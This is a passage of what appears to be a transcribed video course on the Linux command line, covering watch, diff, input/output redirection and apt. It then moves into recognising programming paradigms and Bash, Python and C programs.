And then, this time when we do it, it updates every one second and the seconds are ticking up. As we watch it,
we can also get it highlight.
[Video description begins] He switches to the first Terminal window. [Video description ends]
So, -d option, it will highlight the changes. So it puts a little highlight over the number that's changing on every
tick of the seconds. So this is very helpful if we have a command that has a lot of information on the screen
and it's updating in different parts. We can see the highlights of the changes.
[Video description begins] In the output, he points to the header "Every 1.0s: date". [Video description ends]
Now it also has a header showing every 1.0s: date, the command.
[Video description begins] He switches to the first Terminal window. [Video description ends]
Let's suppose we want to hide that information and just have the contents. Well, we can add the -t.
[Video description begins] He executes the following command: watch -n 1 -d -t date. The output window
opens and displays the system's date and time at an interval of 1 second. The seconds are highlighted and the
aforementioned header is not displayed. [Video description ends]
So if we add the -t option, it doesn't show the header. It just shows the contents of the program the date
program.
[Video description begins] He switches to the first Terminal window. [Video description ends]
Another way we can use watch is with the ls command. If I do watch ls, let's say, ls -l. We'll watch the contents
of a directory.
[Video description begins] He executes the following command: watch ls -l. The output window opens and
displays the list of files and directories at regular intervals. [Video description ends]
So now if I go to the other terminal window, go into the Documents folder and I'll create another file.
[Video description begins] He switches to the second Terminal window. [Video description ends]
[Video description begins] He executes the following command: cd Documents/. No output displays and the
prompt changes to steve@vm1:~/Documents$. [Video description ends]
[Video description begins] He executes the following command: touch new_file. No output displays. He
switches to the output window. [Video description ends]
And if I go back, I see that file show up in my watch. So I just watched this directory for this new file to
appear. And that concludes this demonstration of file monitoring.
[Video description begins] Topic title: File Comparison. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to compare files using the diff command.
[Video description begins] The Terminal window opens: steve@vm1:~/Documents$. [Video description ends]
Often when tracking down errors, especially configuration errors on a system, diff comes to the rescue. When
you have a particular configuration and a reference to what the configuration file should be, you compare the
expected configuration with the actual system configuration, and the unexpected value shows itself
immediately. Not to mention comparing multiple versions of scripts or source code files to see what changes
have been made. So diff compares text files in a line by line fashion. And we'll look at a simple example to
highlight what you should expect to see. So I'll work with two versions of a file. So I'll do a cat and tale1,
which has the first four lines from A Tale of Two Cities by Charles Dickens.
[Video description begins] He executes the following command: cat tale1. The output displays the content of
the tale1 file. [Video description ends]
And I'll do cat tale2 which has something very similar but there are some minor changes. In tale2 there's an
extra space or an extra line, an empty line after it was the worst of times.
[Video description begins] He executes the following command: cat tale2. The output displays the content of
the tale2 file. [Video description ends]
And it was the age of Wisdom has a capital W instead of a lowercase W. And instead of it was the age of
foolishness, the second one has it was the age of craziness. So now let's do a straight diff of those two files. So
we'll do a diff of tale1 tale2. So I just specify the two files, and it gives me a diff.
[Video description begins] He executes the following command: diff tale1 tale2. The output displays the
differences in the files by comparing the files line by line. [Video description ends]
And what it does the first line has 3,4c3,5. So it's comparing lines 3 and 4, with lines 3 to 5, in the second one.
[Video description begins] In the output, he points to 3,4c3,5. [Video description ends]
So we have the less than symbol pointing to the first file. It was the age of wisdom. It was the age of
foolishness, and then three hyphens and then greater than arrows pointing to sort of to the right, to the second
file tale2 and then it has the empty line. And then it was the age of Wisdom. It was the age of craziness. So
Wisdom because of the capital W. Now if I rerun the same command, but add in the option -i, it was the age of
Wisdom is no longer a difference.
[Video description begins] He executes the following command: diff -i tale1 tale 2. The output displays the
differences in the files by comparing the files line by line and ignoring the case differences in file
contents. [Video description ends]
Because the only difference was the case of the W. Wisdom with the capital W, and wisdom with the
lowercase W. We could also show their differences using different results. There's the context result, so diff- c-
i tale1 and tale2.
[Video description begins] He executes the following command: diff -c -i tale1 tale2. The output displays the
differences in the files in a contextual manner by comparing the files line by line and ignoring the case
differences in file contents. [Video description ends]
So you can see in this case, it shows the files and shows the differences with exclamation marks.
[Video description begins] In the output, he points to the exclamation marks present in front of the lines which
have differences. [Video description ends]
[Video description begins] In the output, he points to the + sign present in front of an empty line. [Video
description ends]
So lines 1 to 4 and 1 to 5. And it gives some information of tale1 and tale2 when dates and times so the date
and time stamp differences.
[Video description begins] In the output, he points to the date and time of tale1 and tale2. [Video description
ends]
So it gives us some more information about the context of the differences. And there's also a version of
differences called -u for unified and I'll keep this case insensitive as well with the -i with tale1 and tale2. So
here it gives similar information to the context, but it's a little bit more concise.
[Video description begins] He executes the following command: diff -u -i tale1 tale2. The output displays the
differences in the files in an unified manner by comparing the files line by line and ignoring the case
differences in file contents. [Video description ends]
[Video description begins] In the output, he points to -it was the age of foolishness, +it was the age of
craziness,. [Video description ends]
So it was the age of foolishness. Plus it was the age of craziness. So it shows the two versions side by side.
And then it has the empty line. And then the it was the age of wisdom, which is on that line in the first version.
[Video description begins] In the output, he points to the + sign present in front of an empty line. [Video
description ends]
So different ways you can display the differences between files. And that concludes this demonstration of file
comparisons.
In this video, you will learn how to redirect the inputs and outputs of commands and files.
Objectives
[Video description begins] Topic title: Redirecting Input and Output. The presenter is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to redirect the inputs and outputs of commands and files.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
This makes it easy to take the output of one program and either create a file with it or append it to an existing
file. So let's look at some examples. So let's say I have the command echo and then in quotes, I specify Hello,
World!.
[Video description begins] He executes the following command: echo "Hello, World!". The output displays
line of text that is passed as an argument. [Video description ends]
So this just prints, "Hello, World!". Well, what if I want the results of this echo to be put into a file? Well, if I
take the command again, and put a greater than symbol, this is the redirection, the output redirection and I say,
hello.
[Video description begins] He executes the following command: echo "Hello, World!" > hello. No output
displays and the prompt remains the same. [Video description ends]
Now if I do a cat on the file hello that was just created, its contents are Hello, World!.
[Video description begins] He executes the following command: cat hello. The output displays the content of
the given filename. [Video description ends]
Let's do another echo. Let's say echo and "How are you?" and then I put a double greater than symbol. So this
is the append redirection and now do that to hello.
[Video description begins] He executes the following command: echo "How are you?" >> hello. No output
displays and the prompt remains the same. [Video description ends]
And now if I do a cat of hello, it has Hello, World! and then How are you?
[Video description begins] He executes the following command: cat hello. The output displays the content of
the given filename. [Video description ends]
So this is redirecting the standard output into a file. Now let's look at another command. I'll do a find, it's going
to look in the root folder of the system. Then -name, and I'm going to look for the name hello, which should
find the file "hello" that I've just created in this folder. But when I run this, find gets a number of errors saying
Permission denied.
[Video description begins] He executes the following command: find / -name "home". Permission denied
messages are displayed. [Video description ends]
So running as my current user steve, find can't look in all of the folders that it said Permission denied for. So I
might want to do something with that output. So one thing I could do when I run this command, I'll put a space
at the end the number two, which is the standard error, and then I put the greater than symbol. So I'm
redirecting the standard error output. So anytime there's an error like Permission denied, it will take this error.
And I'm going to redirect it into /dev/null. So putting it in the null device just gets rid of the output, so it's
going to nothing.
[Video description begins] He executes the following command: find / -name "hello" 2>/dev/null. The output
reads: /home/steve/Documents/hello. [Video description ends]
And now, when I run it, it only shows me what I'm trying to find it doesn't show all of the error. Now, if I do
an ls on /home/steve and I specify as well /root. So it's going to do an ls on both of these folders and combine
the results.
[Video description begins] He executes the following command: ls /home/steve /root. The output reads:
/home/steve: Desktop Documents Downloads Music Pictures Public snap Templates Videos. The window
prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
So in home/steve, it works perfectly fine. It returns the folders that are in that directory. But when I do an ls
on /root, it gives me Permission denied.
[Video description begins] He executes the following command: ls /home/steve /root > ls_results. The window
prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
Now if I wanted to output this to a file, let's say the ls_results and I do a cat of ls_results, it only shows me the
results that have been returned.
[Video description begins] He executes the following command: cat ls_results. The output reads: /home/steve:
Desktop Documents Downloads Music Pictures Public snap Templates Videos. [Video description ends]
And the error doesn't get logged. It doesn't get put into this file. But maybe that's what we want. So there's a
clever way to take the output from our standard error, so where the Permission denied happens and put it into
our standard output. And to do that we do 2 with the redirect, so greater than symbol &1. So this redirects the
output from the standard error to the standard input. And I want to do this on the ls command, so ls
/home/steve /root 2 greater than &1. So if you ever see this combination 2 greater than & 1, it's just redirecting
the error to the standard output so that we can get the results.
[Video description begins] He executes the following command: ls /home/steve /root 2>&1. The output
reads: /home/steve: Desktop Documents Downloads Music Pictures Public snap Templates Videos. The
window prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
[Video description begins] He executes the following command: ls /home/steve /root 2>&1 > ls_results. The
window prompts: ls: cannot open directory '/root': Permission denied. [Video description ends]
And now if I do a cat of ls_results, and now I have a small typo here.
[Video description begins] He executes the following command: cat ls_results. The output reads: /home/steve:
Desktop Documents Downloads Music Pictures Public snap Templates Videos. [Video description ends]
What we need to do is put the redirection to the file first. So ls/home/steve /root and then redirect it to the file
and then do the redirection of 2 to &1.
[Video description begins] He executes the following command: ls /home/steve /root > ls_results 2>&1. No
output displays and the prompt remains the same. [Video description ends]
And now if we look at the contents of ls_results, we see that we get the contents of home/steve.
[Video description begins] He executes the following command: cat ls_results. The output reads: /home/steve:
Desktop Documents Downloads Music Pictures Public snap Templates Videos ls: cannot open directory
'/root': Permission denied. [Video description ends]
And then the error cannot open directory /root Permission denied, all stored in the file. Now input redirection
works somewhat similarly. Let's say we do a word count with wc -l to count the number of lines of the file
tale1.
[Video description begins] He executes the following command: wc -l tale1. The output displays the number of
lines and the name of the given file. [Video description ends]
So this shows 4 tale1. So it shows the contents of the file including the file name. Well, if we run wc -l and use
the input redirection so the less than symbol to take tale1, the contents of tale1 and redirect it to the command,
it just shows the number of lines.
[Video description begins] He executes the following command: wc -l < tale1. The output displays the number
of lines of the given filename. [Video description ends]
It doesn't show the filename, and it might be preferable to get the result in this format. And this is the same as
doing cat of tale1 | wc -l and we get the same thing.
[Video description begins] He executes the following command: cat tale1 | wc -l. The output displays the
number of lines of the given filename. [Video description ends]
So you can think of it in those terms. And that concludes this demonstration of redirecting input and output.
During this video, you will learn how to install, remove, and search for packages using apt.
Objectives
[Video description begins] Topic title: Package Management. The presenter is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to install, remove, and search packages using APT.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So APT is a standard package manager that connects to software repository and installs common packages or
programs. Now since we're running on an Ubuntu system, it will connect to the Ubuntu repository. This also
gives us a way to keep our systems up to date. So to run APT, many of the commands need to be run as root.
[Video description begins] He executes the following command: sudo apt update. The window prompts to
enter password for Steve.[Video description ends]
So we'll do sudo apt update and this will update our list of local packages.
[Video description begins] The output displays that local package index is updated with the latest changes
made in the repositories. [Video description ends]
And once that completes, we can do sudo apt upgrade to upgrade any local packages that need upgrading.
[Video description begins] He executes the following command: sudo apt upgrade. The output displays that
local package index is upgraded. [Video description ends]
So currently, our packages are all up to date. We can remove packages. So let's check to see if a package
exists. So we'll do apt-cache, search, and we're going to search for the package nginx which is a web server.
[Video description begins] He executes the following command: apt-cache search nginx. The output displays
the search results for nginx. [Video description ends]
Now this gives us a whole list of possible nginx libraries and nginx, the actual web server. And I have this
installed locally and what I'm going to do is remove it. So I can do sudo apt remove nginx.
[Video description begins] He executes the following command: sudo apt remove nginx. The output displays
that nginx is removed. [Video description ends]
And this will remove the package from the local system and uninstall and stop the program from running. If
we want to remove it completely, we can do a purge sudo apt purge nginx.
[Video description begins] He executes the following command: sudo apt purge nginx. The output displays
configuration and data files of nginx are deleted. [Video description ends]
So if there's any dependencies, any extra files anything locally, it will completely remove those dependencies.
And here we don't have any so we're okay. Now we can reinstall it, doing sudo apt install nginx. And this will
reinstall it.
[Video description begins] He executes the following command: sudo apt install nginx. The output displays
that nginx is installed. [Video description ends]
And if I do a curl of local host, it actually returns the Welcome to nginx page.
[Video description begins] He executes the following command: curl localhost. The output displays the
Welcome to nginx! page and its HTML content. [Video description ends]
So the HTML contents of it and we see in the body of the HTML, so there's some tags here.
[Video description begins] In the output, he points to <body> <h1>Welcome to nginx!</h1>. [Video
description ends]
[Video description begins] In the output, he highlights Welcome to nginx! [Video description ends]
Now this is meant to be rendered by a web browser like Firefox. So what we see here in the plain text
underlying HTML code from this document. But it's a good way of testing to see if it's actually working, if curl
returns the web server contents like this, after nginx has been installed. Now, a couple more commands that we
use with apt. One is called autoclean. So it removes any files from the local repository, any packages that are
no longer in use or can no longer be downloaded from the repository. So quite often we'll do a Sudo apt auto
clean and if there are any it will remove it.
[Video description begins] He executes the following command: sudo apt autoclean. The output displays that
obsolete packages are removed. [Video description ends]
Another one that is related is autoremove. It cleans up any orphaned packages. We'll do sudo apt autoremove
such as library files or dependencies, where the main package has been removed and they're no longer being
referenced.
[Video description begins] He executes the following command: sudo apt autoremove. The output displays that
orphaned packages which are no longer needed are removed from the system. [Video description ends]
One thing that I do quite often is run sudo apt update, and then I use the double &&, which means run update,
and then run sudo apt upgrade. After sudo apt update complete successfully. So the double && requires that
update complete successfully before running upgrade, and then I do a && sudo apt, autoremove, && sudo apt
autoclean.
[Video description begins] He executes the following command: sudo apt update && sudo apt upgrade &&
sudo apt autoremove && sudo apt autoclean. The output displays that local packages are updated and
upgraded and the orphaned and obsolete packages are removed. [Video description ends]
So I usually have this in a script and if I want to do a fresh update and upgrade, I just run all of these
commands in one go. And that concludes this demonstration on installing, removing, and searching packages
using APT.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the commands available for the Linux command line to perform a number of
tasks, including working with text files and packages. We did this by exploring the common properties of
command line environments, the Bash shell and PowerShell environments. How to use commands to perform
text editing and text processing. How to perform repeat actions and use the Bash history. How to perform
process control tasks. Then how to schedule jobs, and perform command monitoring. How to perform file
monitoring and comparison. How to redirect the inputs/outputs of commands and files. And how to perform
package management tasks. In our next course, we'll move on to explore how to identify scripts and programs
written in a number of common programming languages, including Python, C, C++, and SQL.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
I've been a software developer and IT consultant for almost a quarter of a century. I've traveled around the
globe to serve clients responsible for building software architectures, hiring development teams, and solving
complex problems through code. With my toolbox of languages, platforms, frameworks and APIs, I round out
my coding experience with a formal background in mathematics and computer science for Mount Allison
University. In this course, we're going to explore code recognition of various programming languages used in
security applications and security exploits, including Python, C, C++, and SQL.
I'll start by examining the common programming paradigms and their features, and demonstrate how to
identify bash and Python scripts. I'll then explore the elements of a common C and C++ program, and compare
and contrast C# with the C and C++ languages. Next, I'll examine regular expressions in typical regex engines,
and show how to identify PowerShell scripts and the elements of a SQL statement. I'll then explore common
security vulnerabilities in code that can lead to exploits, and explore executable formats based on their binary
signatures. Lastly, I'll demonstrate how to verify the integrity of a downloaded file based on its hash value.
After completing this video, you will be able to describe common programming paradigms and classify them
based on their features.
Objectives
describe common programming paradigms and classify them based on their features
[Video description begins] Topic title: Coding Paradigms. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll describe common programming paradigms and classify them based on their features. I'll
explain the terminology used and what it means when describing a language. An analogy to this would be for
food. We describe food by its taste, texture, and appearance, and our personal description of the flavor.
Programming language descriptions usually focus on how the code is written in the particular language. So one
of the first ways we can describe a language is with the imperative. And we can think of this in its grammatical
terms.
So we're using imperative to order or request something, telling a program what to do about the program state.
This comes up in C, C++, and Python, and these are ones we're going to talk about in the coming videos.
Languages whose statements modify a program's state more directly are considered imperative. Although,
modern C++ and Python have more of what we call multi-paradigm features, where you can write code with
functional methods like lambdas.
But most of the language statements and constructs are usually done in the imperative. The next paradigm is
functional. So we humans are generally good at finding patterns, abstractions, and using mathematics. At least
the mathematicians and computer scientists who work on these sort of problems, they're good at creating these
programming paradigms, which is why we have functional languages.
Which is described as compositions of mathematical functions and expressions, rather than state modifying
commands. So implementations of this are Lisp, Scheme, and Haskell. Well, Lisp is short for List Processor,
it's one of the oldest programming languages or approaches based on lambda calculus. So its roots are more
heavily embedded in mathematics. And Scheme is actually a popular dialect of Lisp in modern use. So one of
the features that most Lisp languages have is that there's a lot of parentheses that enclose the lisps.
So if you see a language with lots and lots of parentheses, no jokingly, Lisp is often called lost in silly
parentheses, because there's so many of them. That's just one of the features or how things get built using a
Lisp. Now Haskell's another approach, which is an example of a popular, newer and modern functional
language. And it's very different from Lisp in that it's only been around for 30 years, so it's new by functional
standards. And then we have domain specific languages, so languages built for a specific computing purpose.
We have things like shell scripting like Bash, PowerShell, and markup languages like Markdown and HTML.
And as well, you have things like modeling languages for tools like computer aided design. Whereas, many
other examples I have here of imperative and functional languages can be thought of as general purpose
programming languages. The domain specific languages fall in a category off to the side of that. Now Bash can
be considered an imperative language, but it's built for a specific purpose, so it falls under a domain specific
language category.
Some other descriptors we use, and some other categories, which are not all mutually exclusive. We have
things like object-oriented programming. So this is where we have classes with properties and methods, which
act as blueprints for objects to be used in our programs. We can create subclasses that inherit properties from
their parent classes, but modifier implement different properties or methods on their own.
We have declarative languages, which many functional languages fall under. So we have declarative languages
like query languages, functional programming, and regular expressions. The best way to describe a declarative
language is one that describes what needs to be done, but not the individual steps on how to do it. We have
multi-paradigm languages. So there's not just imperative or functional, they're not mutually exclusive. Or they
can have object-oriented features, etc.
You can program using different features and taking a functional approach, or maybe not. There's a choice in
the paradigm in the flavor you choose when coding. And then we have general-purpose programming. So these
are used to solve problems in multiple areas, and can be run in different environments and compiled for
different systems. These are languages like C, C++, Java, Python, these are all used to solve problems for
many different computing tasks and in computing environments.
This is in contrast to languages built for specific uses, like the commandline shell languages or markup
languages or even machine control languages like CNC, where instructions are limited and cannot be used
outside of its problem domain. Now I'll talk a bit more about imperative languages. So imperative languages
have statements. So these are written in the imperative to modify the state of a program. They have procedures,
functions, but not necessarily classes.
Some structures, like the C struct, has multiple properties, but doesn't have methods or inheritable traits like
object-oriented languages. The languages that are object-oriented can be written in the imperative. These
properties are not mutually exclusive. So you think of procedures as functions or subroutines that modify the
state of a program. So traditionally, languages more closely related to the machine code they're composed from
can be thought of as imperative.
So the low level instructions that describe the gates, and the transistors, and processors, and memory can be
thought of as imperative machines. And languages like C are abstractions of this machine code. Then we have
functional languages. So composition of functions, often where we express function composition as an
operator. Or oftentimes, we recursively compose functions that call themselves from within themselves. And
we do this more naturally in functional languages than we do in imperative languages.
We have combinators, or higher order functions like map, filter, fold, reduce. And compositions of these
methods such as the use of the MapReduce approaches. So this is characteristic of functional programming
languages. And then we have pure functions, which we often call side-effect free. So you can think of this as a
function that will always return the same result given the same arguments. So it won't include anything in its
calculations outside of the arguments you pass it. So no global variables or no other separate program state is
involved.
And then we have domain specific languages. So these are targeted for a particular platform or purpose. Some
are embedded in other programs. JavaScript started as a domain specific language for the web embedded in the
Netscape web browser. Now JavaScript has changed and since expanded into a general purpose language, and
it's not just used for the web anymore. Another example is a spreadsheet, using spreadsheet formulas and
macros. So these are embedded in the spreadsheet software, but aren't generally used outside of that
environment.
Often, domain specific languages are limited, and often prevents you, or doesn't have the features to go outside
of its own domain of what its been built for. But these limitations often help it be less redundant, so there are
usually fewer ways to accomplish particular tasks. So it's less redundant in terms of how it can be used, which
is often a direct result of its limitations. So that concludes this presentation of common terminology and the
high level descriptions of common coding paradigms.
In this video, you will learn how to identify bash scripts based on their features.
Objectives
[Video description begins] Topic title: Identifying Bash Scripts. Your host for the session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to identify Bash scripts based on their features.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_bash_scripts$. [Video description ends]
So in this current folder in Documents/identifying_bash_scripts, I'm going to do an ls to see what file is in
here. So I have a file called hello_world. To see the contents of it, I can do a cat command, or I can open it up
in an editor like Nano. But for this example, I'm just going to use cat, because this is quite small. So I do a cat
of hello_world, here in the terminal window. So the first line is very important. It tells me that it is, indeed, a
Bash script, or it intends to be. There's a # symbol which in Bash is a comment, followed by an ! .
So the combination of # symbol and ! is called the hash bang, or for short, shebang. Then it defines the shell
script environment that it's going to run from, and we have /bin/bash. Now Bash scripts have the # symbol, or
octothorpe, or number sign, as their identifier for a comment. So anything that follows the # symbol is a
comment. Like I have here, this is a Bash comment. Then the next statement is echo, and in double quotes, I
have "Hello, World!". So echo is basically a print command that will just output, or echo, whatever we give it.
If we need to include quotations, you'll see backslashes within the string to include the quotations. So on the
following line, I have echo "Hello, and then world is in double quotes, but since it's within the string enclosed
in double quotes, we need to escape it with the backslash. So we have \"World and then \", again. We can also
access a number of built-in variables. And in this example, I access the PWD variable, which is in all
uppercase. So typically, the built-in variables, the environment variables have a $ sign followed by the variable
name.
So here I have echo and in double quotes, I have Current path: and then I have $PWD. If we're reading a
variable in Bash, it's done with the $ sign. We can get user input using the read command. So user input, I have
echo -n. So the -n suppresses the newline character. So every time you do an echo in Bash, it will
automatically put a new line after it unless you give it a -n. And then it has, "What is your name?". And then
the next line I have read name. So this is going to create a variable called name that's read when we input and
hit Enter when we run the code.
And then at the end, I have echo "Hello, $name!", and that's all in double quotes. Now we can quite often run
the command by just using ./ and then the name of the command. But in this case, it won't let me run it because
this file is not executable. So if I do ls -l, the file permissions for this file, for this hello_world, are read-write,
read-write and read. So this is for user group and everyone, but we'd like to be able to execute the file. So I can
do chmod +x hello_world.
And now if I do ls- l, it shows that the execute flag has been set, and then in this particular terminal, executable
programs are highlighted in green. So if I do ./hello_world, it will run the code. Now, our shell environment
knows how to run it because in the shebang at the top, we said we're going to use Bash. We could also type
bash hello_world, and it will run it just the same.
[Video description begins] The following field appears in the output: What is your name?. [Video description
ends]
And you can see when it stopped execution for What is your name, to allow me to input whatever I type and
hit Enter. And then it takes that into the variable and prints. And in this running of the program, it printed
Hello, joe!, which is what I typed. And you'll notice the Hello, "World", with the double quotes, the
backslashes are dropped when it's printed because they're only there to escape the double quotes. So the
backslashes don't actually get printed and that's what we want. And the PWD variable has the current path. So
the current working directory.
So whatever we've navigated to, in this case, it's in our home folder which at the command prompt is only the
tilde character. So, /home/steve/Documents/identifying_bash_scripts.
[Video description begins] In the output, he points at the Current path. [Video description ends]
And that concludes this demonstration of identifying Bash scripts.
In this video, you will learn how to identify Python scripts based on their features.
Objectives
[Video description begins] Topic title: Identifying Python Scripts. Your host for the session is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to identify Python scripts based on their features.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_python_scripts$. [Video description ends]
So lets have a look in the current folder in the identifying Python scripts folder. So I have two scripts. One is
hello_world2.py, and hello_world.py. So let's have a look at hello_world.py first, nano hello_world.py will
open the file.
[Video description begins] The hello_world.py file opens. It has thirteen lines of code. [Video description
ends]
And the first line, as in most shell scripts, we have the shebang. So we have the # symbol or octothorpe,
followed by an ! and then the program that's going to run in the shell environment. So we have /usr/bin/env
python3.
So this particular one is a pythons3 script. So in Python, it quite often starts with some imports if there is some.
In this case there's an import sys, and then we have a function. So functions in Python are created with the def
keyword.
So def to define a function, then I call it my_function, and it defines a single parameter called param.
Now, indenting is very important in Python. Anything that's indented under a block of code, such as a function,
belongs to that function. But anything that's back at the same level or justified to the left like this print("Hello,
World!"), happens outside of the function.
So print("Hello, World!") is the first real line of code that we have that's actually going to carry out some
action. Then we have a call to my function, so we just specify the function name my_function. We pass an
argument, in this case the string Steve, which will call the function my function which should print Hello
Steve.
And then I have a statement, an if statement. So we have if true, which means that this if statement will always
be true.
[Video description begins] He points at code line 11. [Video description ends]
At the end of the if statement, it has a colon. Then the next line is indented to be inside of the if block. So the
print exiting with the ellipsis is inside the if, and then sys.exit. Now we don't explicitly need to call sys.exit.
[Video description begins] He points at code lines 12 and 13. [Video description ends]
So this is a way of gracefully exiting the code before you reach the end. But in this example, it's a little
unnecessary but I wanted to put it in to show how we access imports. So we import this sys object, and then we
call a function on the sys object. And our program will end. If it wasn't there, our program would still end
because it would reach the end of our code. So exit this. And if I try, I can't just run hello world directly. If we
want to run hello world, we can type python3 hello_world.py, and it will run the code.
So we get Hello, World!, Hello Steve and Exiting. Now I can run it directly if I add the executable flag to it, so
chmod or chmod +x hello_world.py. And now I can just do a ./hello_world.py. And because of the shebang at
the top saying that it's a Python3 script, our shell environment knows how to execute it. So now let's have a
look at the other example. I'll type nano of hello_world2.
[Video description begins] The hello_world2.py file opens. It has thirteen lines of code. [Video description
ends]
So in this example, the main difference is the shebang is, so we have octothorpe or hash !/ usr/bin/python.
So this is going to run Python directly, but in this case, it's python2. So in this format it is typically python2,
even though at the time of this recording, python2 has reached end of life. So it's no longer officially
supported. But it does a lot of the same things with some minor differences. So we have an import of sys that's
the same as our python3 script.
[Video description begins] He points at code line 2. [Video description ends]
The function is defined similarly, except I've called this hello_you, and it takes the argument param.
And then the print statement inside of this function. The big difference here is there's no open and close
parentheses.
[Video description begins] He points at code line 5. It reads: print "Hello, {}!".format(param). [Video
description ends]
So print is a special kind of statement in python2, whereas in python3, we have to treat it as an actual function
for it to work. So quite often, you can run some python2 and python3 code interchangeably, but this is one of
the cases where you can't. If you try to run this as python3, it would fail because there's no open and close
parenthesis around the script. So one of important way of identifying python2 code as oppose to python3 code,
is the absence of the parenthesis in the print. And then I go on to print Hello, World, and I call hello_you with
Steve as the argument.
[Video description begins] He points at code line 7. He points at code line 9. [Video description ends]
And then if true I print Exiting, followed by the ellipsis, just as they did in the other program, and I call
sys.exit.
[Video description begins] He points at code lines 11 and 12. He points at code line 13. [Video description
ends]
If you haven't noticed already, the print statements are calling strings with double quotes, whereas in the
python3 example, there were single quotes.
[Video description begins] He points at code line 12. [Video description ends]
Now it doesn't really matter. I can use single quotes or double quotes, as long as they open and close with the
same style quote. I can put single quotes or double quotes in python2 or 3, and it works just the same. So I'll
exit out of this. And now I'll do python of hello_world2.py. And I get Hello, World!, Hello, Steve! and Exiting
as expected. Well, let's try python3 of hello_world2.py. And it fails.
So we get a SyntaxError on the print statement, because there is no parenthesis around it. But that's because it
doesn't know what to do with the print statement without the parenthesis. Now let's try it the other way around.
If I type python of hello_world.py, it actually works.
[Video description begins] Three lines of output appears. [Video description ends]
It actually runs the python3 example in python2. Now, this doesn't always work. It only works in the case
when the python3 code doesn't have anything particularly special to python3. So it could be still valid python2,
but you still have to be careful. And that concludes this demonstration of identifying Python scripts.
[Video description begins] Topic title: Identifying C programs. Your host for the session is Steve Scott. [Video
description ends]
In this video, I'll describe the elements that make up a common C program.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_c_programs$. [Video description ends]
So in my current folder, identifying_c_programs, I'm going to run ls in this terminal window and have a look
at some of the files. Now a number of these files are common files associated with the Gnu Autotools
connection. Such as the configure.scan, the configure.ac, the Makefile.am, and the Makefile.in. So these are to
manage dependencies and build parameters that support common C programs. Now there are different build
tools and make files, this is just one example. You can even take the C file hello_world.c and compile it
directly with a C compiler.
But this doesn't typically scale when you want to target different platforms and environments. Most often when
you download C source code for a program with Makefiles and a configure script, you type ./configure like I
did here. Then run make if there's anything to be done. Now since this has already been compiled, it says
there's nothing to be done. If you want to do a clean make you do make clean and it removes the program and
the object files. And now it can run make.
[Video description begins] The following output appears: rm -f hello_world * .o. Three files appear: cc,
hello_world.c, and -o hello_world. [Video description ends]
And typical software packages have a make install program to install the program from source onto your
computer. Now the files will look a lot like this or at least somewhat similar. Now each build system has its
own particulars and some have different approaches. And this is also similar for C++ programs. But let's look
at the C file itself and see what makes up a common C program. So I'll run nano on hello_world.c.
[Video description begins] The hello_world.c file opens. It has twenty six lines of code. [Video description
ends]
The first line in this case starts with a comment, /* Hello, World */ to end the comment block. Now this style
of comment can also span multiple lines if you wish, anything within the block. Now after this leading
comment, we have an include directive. So this is a include pre-processor statement.
[Video description begins] He points at code line 2. [Video description ends]
Before a compiler actually compiles the C source code, it brings in code from the header files, typically files
with the .h extension, to allow you to bring in existing code and libraries from other sources. Almost all C
programs have include files and these are two of the more common ones. So it's written #include, and then in
angle brackets, so < and > we have the file. So stdio.h and stdlib.h.
[Video description begins] He highlights code lines 2 and 3. [Video description ends]
Then we define a main function. So this is the main entry point into the application.
It always returns int so we have int main, so main all in lowercase. And then we define its parameters in
parentheses. Now typical C programs have either no parameters defined in its main function or it has int argc,
char, C-H-A-R, * and then argv followed by [ ]. So argc is the number of arguments. So if you type the
command, followed by some command line arguments or options, they get passed through these variables.
argc has the number of them passed and argv has their values, so c for count and v for values. Then the first
line we call printf. So this causes it to print it to the standard output with Hello, World!.
Now, the printf command doesn't automatically put a new line. We have to explicitly tell it to by putting a \n
character to say print a new line at the end. Then I define a pointer. So a pointer is a pointer to some memory
location that has an asterix on the variable.
So this int pointer, so an integer pointer called p, so int *p followed by a semi-colon. That's another important
thing about C programs, is every statement ends in a semi-colon. Another thing we need to do for pointers is
allocate memory for them. The function to allocate memory in C, which comes from the stdlib header, is
malloc for memory allocation.
[Video description begins] He points at code line 11. [Video description ends]
So I have p =, I give it the type, so (int*, this is called casting. So it takes the memory returned by malloc and
points to it with an int pointer. So we have malloc then the amount of memory we want to allocate. We want to
allocate 10 * sizeof(int). So we want enough bytes for the size of an integer ten times. So that'd be space np to
have ten integers. At this point, if p is null, so we have if p==NULL. So if it's equivalent to null, it means that
it wasn't allocated correctly, so it's set to a null pointer.
[Video description begins] He points at code line 12. [Video description ends]
If this is a case, we do a printf of memory allocation error and then we call exit(0).
[Video description begins] He points at code line 13. He points at code line 14. [Video description ends]
So this will exit the program at this point. Otherwise it'll do a printf of memory allocated for p.
[Video description begins] He points at code line 16. [Video description ends]
And then I have a comment saying do something with p.
[Video description begins] He points at code line 18. [Video description ends]
So typically something would be done with p. And then once we're done with it, we free the allocated memory
by calling free.
[Video description begins] He points at code lines 20 and 21. [Video description ends]
[Video description begins] He points at code line 22. [Video description ends]
[Video description begins] He points at code line 24. [Video description ends]
So the success status of a program is 0 and anything else is a failure. That is, 0 means no failure, so it returned
successfully. And then we close our main function with a closing brace that matches up with the opening brace
of our main function.
[Video description begins] He points at code line 25. [Video description ends]
So code blocks in functions or methods are defined within the curly braces. So let's close this now and we'll
run ./hello_world. And that prints the output from our program. So we have hello world, memory allocated for
p, and memory freed successfully. And that concludes this demonstration of identifying C programs.
[Video description begins] Topic title: Identifying C++ programs. Your host for the session is Steve
Scott. [Video description ends]
